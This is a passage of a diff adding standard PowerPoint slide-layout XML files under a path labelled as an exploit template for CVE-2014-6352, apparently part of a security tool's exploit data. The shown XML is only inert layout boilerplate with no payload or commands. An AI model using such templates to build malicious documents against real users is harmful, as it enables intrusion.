noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>‹#›</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout11.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="vertTitleAndTx" preserve="1"><p:cSld name="Vertical Title and Text"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Vertical Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title" orient="vert"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="6629400" y="274638"/><a:ext cx="2057400" cy="5851525"/></a:xfrm></p:spPr><p:txBody><a:bodyPr vert="eaVert"/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Vertical Text Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="body" orient="vert" idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="457200" y="274638"/><a:ext cx="6019800" cy="5851525"/></a:xfrm></p:spPr><p:txBody><a:bodyPr vert="eaVert"/><a:lstStyle/><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Date Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Footer Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Slide Number Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>‹#›</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout2.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="obj" preserve="1"><p:cSld name="Title and Content"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Content Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph idx="1"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Date Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Footer Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Slide Number Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>‹#›</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout3.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="secHead" preserve="1"><p:cSld name="Section Header"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="722313" y="4406900"/><a:ext cx="7772400" cy="1362075"/></a:xfrm></p:spPr><p:txBody><a:bodyPr anchor="t"/><a:lstStyle><a:lvl1pPr algn="l"><a:defRPr sz="4000" b="1" cap="all"/></a:lvl1pPr></a:lstStyle><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Text Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="body" idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="722313" y="2906713"/><a:ext cx="7772400" cy="1500187"/></a:xfrm></p:spPr><p:txBody><a:bodyPr anchor="b"/><a:lstStyle><a:lvl1pPr marL="0" indent="0"><a:buNone/><a:defRPr sz="2000"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl1pPr><a:lvl2pPr marL="457200" indent="0"><a:buNone/><a:defRPr sz="1800"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl2pPr><a:lvl3pPr marL="914400" indent="0"><a:buNone/><a:defRPr sz="1600"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl3pPr><a:lvl4pPr marL="1371600" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl4pPr><a:lvl5pPr marL="1828800" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl5pPr><a:lvl6pPr marL="2286000" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl6pPr><a:lvl7pPr marL="2743200" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl7pPr><a:lvl8pPr marL="3200400" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl8pPr><a:lvl9pPr marL="3657600" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Date Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Footer Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Slide Number Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>‹#›</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout4.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="twoObj" preserve="1"><p:cSld name="Two Content"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Content Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph sz="half" idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="457200" y="1600200"/><a:ext cx="4038600" cy="4525963"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr><a:defRPr sz="2800"/></a:lvl1pPr><a:lvl2pPr><a:defRPr sz="2400"/></a:lvl2pPr><a:lvl3pPr><a:defRPr sz="2000"/></a:lvl3pPr><a:lvl4pPr><a:defRPr sz="1800"/></a:lvl4pPr><a:lvl5pPr><a:defRPr sz="1800"/></a:lvl5pPr><a:lvl6pPr><a:defRPr sz="1800"/></a:lvl6pPr><a:lvl7pPr><a:defRPr sz="1800"/></a:lvl7pPr><a:lvl8pPr><a:defRPr sz="1800"/></a:lvl8pPr><a:lvl9pPr><a:defRPr sz="1800"/></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Content Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph sz="half" idx="2"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="4648200" y="1600200"/><a:ext cx="4038600" cy="4525963"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr><a:defRPr sz="2800"/></a:lvl1pPr><a:lvl2pPr><a:defRPr sz="2400"/></a:lvl2pPr><a:lvl3pPr><a:defRPr sz="2000"/></a:lvl3pPr><a:lvl4pPr><a:defRPr sz="1800"/></a:lvl4pPr><a:lvl5pPr><a:defRPr sz="1800"/></a:lvl5pPr><a:lvl6pPr><a:defRPr sz="1800"/></a:lvl6pPr><a:lvl7pPr><a:defRPr sz="1800"/></a:lvl7pPr><a:lvl8pPr><a:defRPr sz="1800"/></a:lvl8pPr><a:lvl9pPr><a:defRPr sz="1800"/></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Date Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Footer Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="7" name="Slide Number Placeholder 6"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>‹#›</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout6.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="titleOnly" preserve="1"><p:cSld name="Title Only"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Date Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Footer Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Slide Number Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>‹#›</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout7.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="blank" preserve="1"><p:cSld name="Blank"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Date Placeholder 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Footer Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Slide Number Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>‹#›</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout8.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="objTx" preserve="1"><p:cSld name="Content with Caption"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="457200" y="273050"/><a:ext cx="3008313" cy="1162050"/></a:xfrm></p:spPr><p:txBody><a:bodyPr anchor="b"/><a:lstStyle><a:lvl1pPr algn="l"><a:defRPr sz="2000" b="1"/></a:lvl1pPr></a:lstStyle><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Content Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="3575050" y="273050"/><a:ext cx="5111750" cy="5853113"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr><a:defRPr sz="3200"/></a:lvl1pPr><a:lvl2pPr><a:defRPr sz="2800"/></a:lvl2pPr><a:lvl3pPr><a:defRPr sz="2400"/></a:lvl3pPr><a:lvl4pPr><a:defRPr sz="2000"/></a:lvl4pPr><a:lvl5pPr><a:defRPr sz="2000"/></a:lvl5pPr><a:lvl6pPr><a:defRPr sz="2000"/></a:lvl6pPr><a:lvl7pPr><a:defRPr sz="2000"/></a:lvl7pPr><a:lvl8pPr><a:defRPr sz="2000"/></a:lvl8pPr><a:lvl9pPr><a:defRPr sz="2000"/></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Text Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="body" sz="half" idx="2"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="457200" y="1435100"/><a:ext cx="3008313" cy="4691063"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr marL="0" indent="0"><a:buNone/><a:defRPr sz="1400"/></a:lvl1pPr><a:lvl2pPr marL="457200" indent="0"><a:buNone/><a:defRPr sz="1200"/></a:lvl2pPr><a:lvl3pPr marL="914400" indent="0"><a:buNone/><a:defRPr sz="1000"/></a:lvl3pPr><a:lvl4pPr marL="1371600" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl4pPr><a:lvl5pPr marL="1828800" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl5pPr><a:lvl6pPr marL="2286000" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl6pPr><a:lvl7pPr marL="2743200" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl7pPr><a:lvl8pPr marL="3200400" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl8pPr><a:lvl9pPr marL="3657600" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl9pPr></a:lstStyle><a:p><a:pPr 